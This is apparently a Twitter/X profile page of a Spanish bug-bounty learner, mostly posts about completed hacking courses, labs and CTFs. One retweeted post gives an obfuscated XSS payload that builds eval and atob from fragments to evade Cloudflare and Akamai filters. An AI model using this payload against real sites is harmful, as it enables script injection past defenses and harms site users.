ant0sec
@ant0sec
Followers
63
Following
4K
Media
21
Statuses
174
I just like to try to find bugs | 🇪🇸CTF Player 21yo
Spain
Joined July 2021
I have just completed the Attacking GraphQL module on HTB Academy! https://t.co/Z7T4N5UlpG
#hackthebox #htbacademy #cybersecurity
academy.hackthebox.com
GraphQL is a query language for APIs as an alternative to REST APIs. Clients are able to request data through GraphQL queries. If improperly configured or implemented, common web security vulnerabi...
1
0
1
I have just completed the Web Fuzzing module on HTB Academy! https://t.co/TBmFDPf08w
#hackthebox #htbacademy #cybersecurity
academy.hackthebox.com
In this module, we explore the essential techniques and tools for fuzzing web applications, an essential practice in cybersecurity for identifying hidden vulnerabilities and strengthening web...
0
0
1
"Hallooween special - Ghost whisper"? Pwned! It was a blast on @YesWeHack! Think you can take it on? 🌟 https://t.co/caVTBcf2Bs
#YesWeHack #ChallengeAccepted
dojo-yeswehack.com
Improve your hacking skills with the free CTF training platform by YesWeHack!
0
0
3
Altered Security Diwali Giveaway! Win FREE access to: • 1 CRTP seat • 1 CARTP seat How to participate: • Like • Comment & tag your Red Team buddies! • Repost Winners will be randomly announced on October 25, 2025 Our Diwali offers are already live - up to 25% OFF on Red
254
258
505
A nice one by @viehgroup to evade Cloudflare & Akamai <address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+['b','c','d'][0]]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>
3
52
324
I spent the last few weeks digging into hundreds of enterprise-built Vibe Coded applications. When I found a security flaw, it was almost always one of the same 4 simple mistakes. Here they are 🧵
5
57
314
I completed the Web Security Academy lab: Excessive trust in client-side controls @WebSecAcademy
0
0
0
I just completed path Bug Bounty Hunter in HTB Academy! https://t.co/YiA6NsFLd2
#hackthebox #htbacademy #cybersecurity
academy.hackthebox.com
The Web Penetration Tester Job Role Path is for individuals who want to enter the world of web penetration testing with little to no prior experience in it. This path covers core web security...
0
0
1
@YourFinalSin Today i will do some enum of one program and read some reports.
0
0
5
Day 0 - Becoming a Bug Bounty Hunter This just starts because of the thread of tweets of @YourFinalSin "Full Time Bug Bounty", i have taken the inpiration to do it by my self. So right now im doing the CBBH cert, and some labs of Portswigger.
7
4
89
I just completed module Using Web Proxies in HTB Academy! 3/20 for CBBH https://t.co/andaLa1Hta
#hackthebox #htbacademy #cybersecurity
academy.hackthebox.com
Web application penetration testing frameworks are an essential part of any web penetration test. This module will teach you two of the best frameworks: Burp Suite and OWASP ZAP.
0
0
0
I just pwned Planning on Hack The Box! That was easy so far :) https://t.co/q6w8in54vB
#HackTheBox #htb #CyberSecurity #EthicalHacking #InfoSec #PenTesting
0
0
1
Si creen tener mala suerte con los trabajos deberían ver este pana
88
313
3K
¡No te pierdas la miduConf! Conferencia de Programación y Tecnología. 👩💻 7 Speakers TOP 💬 Charlas para todos los niveles 🎁 +256 regalos y premios ...¡y muchas sorpresas! Apunta la fecha: 13 de SEPTIEMBRE https://t.co/DJW34AvG3i
0
0
0